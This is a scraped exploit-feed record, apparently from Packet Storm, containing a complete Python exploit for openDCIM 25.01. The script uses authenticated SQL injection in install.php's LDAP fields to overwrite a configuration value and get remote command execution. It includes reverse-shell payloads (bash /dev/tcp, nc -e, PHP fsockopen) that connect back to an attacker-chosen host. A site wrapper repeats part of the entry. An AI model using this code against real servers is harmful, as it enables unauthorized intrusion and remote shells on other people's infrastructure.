{“lastseen”:”2026-04-20T15:50:29″,”description”:”openDCIM version 25.01 remote SQL injection exploit that can be leveraged to execute arbitrary code…”,”published”:”2026-04-20T00:00:00″,”modified”:”2026-04-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 openDCIM 25.01 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:219200″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : openDCIM 25.01 Python Exploit \u2013 Authenticated \\u0026 Time-Based Detection |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.4 (64 bits) |\\n | # Vendor : https:\/\/opendcim.org\/downloads.html |\\n ==================================================================================================================================\\n \\n [+] Summary : This Python script is a security exploitation tool targeting a logical SQL Injection vulnerability in openDCIM\u2019s install.php endpoint, which can be escalated to Remote Code Execution (RCE).\\n \\n [+] POC : \\n \\n #!\/usr\/bin\/env python3\\n \\n import sys\\n import re\\n import time\\n import random\\n import string\\n import requests\\n import urllib3\\n import argparse\\n from urllib.parse import urljoin\\n from base64 import b64encode\\n \\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\n \\n \\n class Color:\\n RED = ‘\\\\033[91m’\\n GREEN = ‘\\\\033[92m’\\n YELLOW = ‘\\\\033[93m’\\n BLUE = ‘\\\\033[94m’\\n PURPLE = ‘\\\\033[95m’\\n CYAN = ‘\\\\033[96m’\\n WHITE = ‘\\\\033[97m’\\n RESET = ‘\\\\033[0m’\\n BOLD = ‘\\\\033[1m’\\n \\n \\n def print_success(msg):\\n print(f\\”{Color.GREEN}[+]{Color.RESET} {msg}\\”)\\n \\n \\n def print_error(msg):\\n print(f\\”{Color.RED}[-]{Color.RESET} {msg}\\”)\\n \\n \\n def print_status(msg):\\n print(f\\”{Color.BLUE}[*]{Color.RESET} {msg}\\”)\\n \\n \\n def print_warning(msg):\\n print(f\\”{Color.YELLOW}[!]{Color.RESET} {msg}\\”)\\n \\n \\n class OpenDCIMExploit:\\n LDAP_FIELDS = [\\n ‘LDAPServer’, ‘LDAPBaseDN’, ‘LDAPBindDN’, ‘LDAPSessionExpiration’,\\n ‘LDAPSiteAccess’, ‘LDAPReadAccess’, ‘LDAPWriteAccess’, ‘LDAPDeleteAccess’,\\n ‘LDAPAdminOwnDevices’, ‘LDAPRackRequest’, ‘LDAPRackAdmin’,\\n ‘LDAPContactAdmin’, ‘LDAPSiteAdmin’\\n ]\\n \\n DOT_PARAM = ‘dot’\\n SQLI_WRAP = [‘\\” WHERE 1=0; ‘, ‘ — ‘]\\n \\n def __init__(self, target_url, username, password, verify_ssl=False, timeout=30):\\n self.target_url = target_url.rstrip(‘\/’)\\n self.username = username\\n self.password = password\\n self.verify_ssl = verify_ssl\\n self.timeout = timeout\\n self.session = requests.Session()\\n self.backup_table = None\\n self.authenticated = False\\n \\n def _get_install_url(self):\\n return urljoin(self.target_url, ‘install.php’)\\n \\n def _get_report_url(self):\\n return urljoin(self.target_url, ‘report_network_map.php’)\\n \\n def _get_login_url(self):\\n return urljoin(self.target_url, ‘index.php’)\\n \\n def authenticate(self):\\n print_status(f\\”Authenticating as {self.username}…\\”)\\n try:\\n response = self.session.get(self._get_login_url(), verify=self.verify_ssl, timeout=self.timeout)\\n \\n csrf_token = None\\n csrf_match = re.search(r’name=\\”csrf_token\\”\\\\s+value=\\”([^\\”]+)\\”‘, response.text)\\n if csrf_match:\\n csrf_token = csrf_match.group(1)\\n \\n login_data = {\\n ‘user_login’: self.username,\\n ‘user_password’: self.password,\\n ‘submit’: ‘Login’\\n }\\n \\n if csrf_token:\\n login_data[‘csrf_token’] = csrf_token\\n \\n response = self.session.post(\\n self._get_login_url(),\\n data=login_data,\\n verify=self.verify_ssl,\\n timeout=self.timeout,\\n allow_redirects=True\\n )\\n \\n if ‘logout’ in response.text.lower() or ‘dashboard’ in response.text.lower():\\n print_success(\\”Authentication successful\\”)\\n self.authenticated = True\\n return True\\n else:\\n print_warning(\\”Authentication may have failed, but continuing anyway…\\”)\\n return False\\n \\n except Exception as e:\\n print_warning(f\\”Authentication error: {e}\\”)\\n return False\\n \\n def _inject_sql(self, field, sql_query):\\n form_data = {‘ldapaction’: ‘Set’}\\n for field_name in self.LDAP_FIELDS:\\n form_data[field_name] = ”\\n \\n form_data[field] = f\\”{self.SQLI_WRAP[0]}{sql_query}{self.SQLI_WRAP[1]}\\”\\n \\n try:\\n response = self.session.post(\\n self._get_install_url(),\\n data=form_data,\\n verify=self.verify_ssl,\\n timeout=self.timeout,\\n allow_redirects=True\\n )\\n return response.status_code in [200, 302]\\n \\n except Exception as e:\\n print_error(f\\”SQL injection failed: {e}\\”)\\n return False\\n \\n def check_vulnerability(self):\\n print_status(\\”Checking if target is vulnerable…\\”)\\n \\n try:\\n response = self.session.get(self._get_install_url(), verify=self.verify_ssl, timeout=self.timeout)\\n \\n if response.status_code not in [200, 302]:\\n print_error(f\\”install.php returned status {response.status_code}\\”)\\n return False\\n \\n body = response.text\\n if not any(k in body for k in [‘ldapaction’, ‘openDCIM’, ‘Upgrade’]):\\n print_warning(\\”install.php doesn’t look like openDCIM\\”)\\n return False\\n \\n except Exception as e:\\n print_error(f\\”Failed to access install.php: {e}\\”)\\n return False\\n \\n print_success(\\”install.php is accessible\\”)\\n print_status(\\”Testing time-based SQL injection…\\”)\\n \\n success = 0\\n \\n for i in range(3):\\n sleep_time = random.randint(1, 3)\\n start = time.time()\\n \\n self._inject_sql(\\n random.choice(self.LDAP_FIELDS),\\n f\\”SELECT SLEEP({sleep_time})\\”\\n )\\n \\n elapsed = time.time() – start\\n \\n if elapsed \\u003e= sleep_time:\\n success += 1\\n print_success(f\\”Delay detected ({elapsed:.1f}s)\\”)\\n else:\\n print_warning(f\\”No delay detected ({elapsed:.1f}s)\\”)\\n \\n return success == 3\\n \\n def backup_config(self):\\n self.backup_table = ”.join(random.choices(string.ascii_lowercase, k=8))\\n print_status(f\\”Creating backup table: {self.backup_table}\\”)\\n \\n sql = (\\n f\\”DROP TABLE IF EXISTS {self.backup_table}; \\”\\n f\\”CREATE TABLE {self.backup_table} AS \\”\\n f\\”SELECT Parameter, Value FROM fac_Config \\”\\n f\\”WHERE Parameter LIKE ‘LDAP%’ OR Parameter = ‘{self.DOT_PARAM}’\\”\\n )\\n \\n return self._inject_sql(‘LDAPServer’, sql)\\n \\n def poison_dot(self, command):\\n escaped = command.replace(‘\\\\\\\\’, ‘\\\\\\\\\\\\\\\\’)\\n print_status(f\\”Poisoning dot parameter…\\”)\\n \\n sql = f\\”UPDATE fac_Config SET Value = ‘{escaped}’ WHERE Parameter = ‘{self.DOT_PARAM}’\\”\\n return self._inject_sql(‘LDAPBaseDN’, sql)\\n \\n def restore_config(self):\\n if not self.backup_table:\\n return False\\n \\n print_status(\\”Restoring configuration…\\”)\\n \\n sql = (\\n f\\”UPDATE fac_Config c INNER JOIN {self.backup_table} b \\”\\n f\\”ON c.Parameter = b.Parameter SET c.Value = b.Value; \\”\\n f\\”DROP TABLE IF EXISTS {self.backup_table}\\”\\n )\\n \\n return self._inject_sql(‘LDAPSiteAdmin’, sql)\\n \\n def trigger_execution(self):\\n try:\\n r = self.session.get(self._get_report_url(),\\n params={‘format’: ‘0’, ‘containerid’: ‘1’},\\n verify=self.verify_ssl,\\n timeout=self.timeout)\\n return r.text.strip()\\n except:\\n return None\\n \\n def execute_command(self, command):\\n print_status(f\\”Executing: {command}\\”)\\n \\n if not self.backup_config():\\n return None\\n \\n if not self.poison_dot(command + \\” #\\”):\\n self.restore_config()\\n return None\\n \\n output = self.trigger_execution()\\n self.restore_config()\\n \\n return output\\n \\n def reverse_shell(self, lhost, lport, shell_type=’bash’):\\n \\n payloads = {\\n ‘bash’: f\\”bash -i \\u003e\\u0026 \/dev\/tcp\/{lhost}\/{lport} 0\\u003e\\u00261\\”,\\n ‘nc’: f\\”nc -e \/bin\/sh {lhost} {lport}\\”,\\n ‘python’: f\\”python3 -c ‘import socket,subprocess,os; …’\\”,\\n ‘php’: f\\”php -r ‘$sock=fsockopen(\\\\\\”{lhost}\\\\\\”,{lport});exec(\\\\\\”\/bin\/sh -i \\u003c\\u00263 \\u003e\\u00263 2\\u003e\\u00263\\\\\\”);’\\”\\n }\\n \\n if shell_type not in payloads:\\n return False\\n \\n print_status(f\\”Reverse shell: {lhost}:{lport}\\”)\\n \\n print_warning(f\\”Make sure listener is running (nc -lvnp {lport})\\”)\\n \\n self.execute_command(payloads[shell_type])\\n return True\\n \\n \\n def main():\\n parser = argparse.ArgumentParser()\\n \\n parser.add_argument(‘target’)\\n parser.add_argument(‘username’)\\n parser.add_argument(‘password’)\\n parser.add_argument(‘command’, nargs=’?’, default=’id’)\\n \\n args = parser.parse_args()\\n \\n print(\\”=\\” * 60)\\n print(\\”openDCIM SQLi RCE Exploit\\”)\\n print(\\”=\\” * 60)\\n \\n exploit = OpenDCIMExploit(args.target, args.username, args.password)\\n \\n exploit.authenticate()\\n \\n if not exploit.check_vulnerability():\\n print_error(\\”Not vulnerable\\”)\\n sys.exit(1)\\n \\n output = exploit.execute_command(args.command)\\n \\n if output:\\n print(\\”\\\\n[OUTPUT]\\\\n\\”, output)\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()\\n \\t\\n Greetings to :==============================================================================\\n jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\\n ============================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/219200″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/219200\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-20T15:50:29″,”description”:”openDCIM version 25.01 remote SQL injection exploit that can be leveraged to execute arbitrary code…”,”published”:”2026-04-20T00:00:00″,”modified”:”2026-04-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 openDCIM 25.01 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:219200″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”==================================================================================================================================\\n | # Title : openDCIM 25.01…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-48074","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n